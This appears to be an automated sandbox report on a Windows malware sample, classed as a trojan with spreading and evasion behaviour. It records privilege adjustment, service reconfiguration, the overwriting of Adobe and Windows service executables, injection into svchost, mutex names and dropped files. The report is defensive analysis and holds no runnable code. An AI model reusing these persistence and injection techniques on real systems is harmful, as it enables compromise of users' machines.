Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0394B1B0	9_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A0B16B	9_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0392F172	9_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0397516C	9_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EF0CC	9_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039470C0	9_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F70E9	9_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FF0E0	9_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FF7B0	9_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F16CC	9_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03985630	9_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DD5B0	9_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03A095C3	9_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F7571	9_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FF43F	9_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03931460	9_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395FB80	9_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B5BF0	9_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0397DBF9	9_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FFB76	9_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039DDAAC	9_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03985AA0	9_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039E1AA3	9_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039EDAC6	9_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FFA49	9_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F7A46	9_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B3A6C	9_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039D5910	9_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03949950	9_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395B950	9_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039438E0	9_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039AD800	9_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03941F92	9_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FFFB1	9_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03903FD2	9_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03903FD5	9_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FFF09	9_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03949EB0	9_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0395FDC0	9_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F1D5A	9_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_03943D40	9_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039F7D73	9_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039FFCF2	9_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_039B9C32	9_2_039B9C32

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Load Driver

Jump to behavior

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03987E54 appears 111 times
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: String function: 00407DE1 appears 35 times
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: String function: 00428900 appears 41 times
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: String function: 00420AE3 appears 70 times

Source: I3LPkQh2an.exe, 00000000.00000003.1397960663.00000000051DD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs I3LPkQh2an.exe
Source: I3LPkQh2an.exe, 00000000.00000003.1397009776.0000000005033000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs I3LPkQh2an.exe
Source: I3LPkQh2an.exe, 00000000.00000003.1387878258.00000000041A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs I3LPkQh2an.exe
Source: I3LPkQh2an.exe, 00000000.00000003.1401373706.0000000004190000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFXSSVC.EXEj% vs I3LPkQh2an.exe
Source: I3LPkQh2an.exe, 00000000.00000003.1365372997.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameALG.exej% vs I3LPkQh2an.exe
Source: I3LPkQh2an.exe, 00000000.00000003.1361222935.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamearmsvc.exeN vs I3LPkQh2an.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys

Source: I3LPkQh2an.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: I3LPkQh2an.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: I3LPkQh2an.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@8/10@7/2

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

File created: C:\Users\user\AppData\Roaming\a8a24eee21ca4edc.bin

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8a24eee21ca4edc9e7986a9-b
Source: C:\Windows\System32\AppVClient.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a8a24eee21ca4edc9ea72c54-b
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8a24eee21ca4edc-inf

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

File created: C:\Users\user~1\AppData\Local\Temp\autB916.tmp

Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: I3LPkQh2an.exe	ReversingLabs: Detection: 86%
Source: I3LPkQh2an.exe	Virustotal: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\I3LPkQh2an.exe "C:\Users\user\Desktop\I3LPkQh2an.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\I3LPkQh2an.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\I3LPkQh2an.exe"	Jump to behavior

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: I3LPkQh2an.exe

Static file information: File size 1793024 > 1048576

Source: I3LPkQh2an.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: I3LPkQh2an.exe, 00000000.00000003.1361170036.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: I3LPkQh2an.exe, 00000000.00000003.1387635055.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1365282595.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1387635055.00000000041A0000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: FXSSVC.pdbGCTL source: I3LPkQh2an.exe, 00000000.00000003.1397863214.0000000004190000.00000004.00001000.00020000.00000000.sdmp, FXSSVC.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: I3LPkQh2an.exe, 00000000.00000003.1397960663.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1398411296.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1699509643.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1697301207.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: I3LPkQh2an.exe, 00000000.00000003.1397960663.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, I3LPkQh2an.exe, 00000000.00000003.1398411296.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000003.1699509643.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1697301207.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1740366789.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: FXSSVC.pdb source: I3LPkQh2an.exe, 00000000.00000003.1397863214.0000000004190000.00000004.00001000.00020000.00000000.sdmp, FXSSVC.exe.0.dr
Source:	Binary string: ALG.pdb source: I3LPkQh2an.exe, 00000000.00000003.1365282595.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\I3LPkQh2an.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: FXSSVC.exe.0.dr

Static PE information: real checksum: 0xa20cd should be: 0x13ee11

Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.0.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB0CAh; ret	0_2_00ADB061
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB30Dh; ret	0_2_00ADB1E6
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB2F2h; ret	0_2_00ADB262
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB255h; ret	0_2_00ADB2ED
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB2D0h; ret	0_2_00ADB346
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00ADB180 push 00ADB37Fh; ret	0_2_00ADB3B7
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AD520C push 00AD528Fh; ret	0_2_00AD522D
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF852Eh; ret	0_2_00AF7F3A
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8514h; ret	0_2_00AF7F66
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF7E66h; ret	0_2_00AF8057
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF817Ah; ret	0_2_00AF808B
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF82E5h; ret	0_2_00AF80D9
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF826Ah; ret	0_2_00AF819E
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF849Ch; ret	0_2_00AF81E4
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF805Ch; ret	0_2_00AF8255
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8321h; ret	0_2_00AF82E0
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF7FBFh; ret	0_2_00AF831F
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF7FA8h; ret	0_2_00AF834C
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF84BAh; ret	0_2_00AF83E2
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8426h; ret	0_2_00AF84D8
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8075h; ret	0_2_00AF84FD
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF808Ch; ret	0_2_00AF8512
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8B6Fh; ret	0_2_00AF8596
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8E94h; ret	0_2_00AF85C9
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF878Bh; ret	0_2_00AF8734
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8D45h; ret	0_2_00AF87D3
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8E5Fh; ret	0_2_00AF885F
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8AB5h; ret	0_2_00AF8B13
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	Code function: 0_2_00AF8550 push 00AF8784h; ret	0_2_00AF8CA1

Source: I3LPkQh2an.exe	Static PE information: section name: .reloc entropy: 7.938027429915368
Source: AppVClient.exe.0.dr	Static PE information: section name: .reloc entropy: 7.943023114735692
Source: FXSSVC.exe.0.dr	Static PE information: section name: .reloc entropy: 7.949295138244339

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Windows\System32\AppVClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\a8a24eee21ca4edc.bin

Jump to behavior

Drops executable to a common third party application directory

Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\user\Desktop\I3LPkQh2an.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
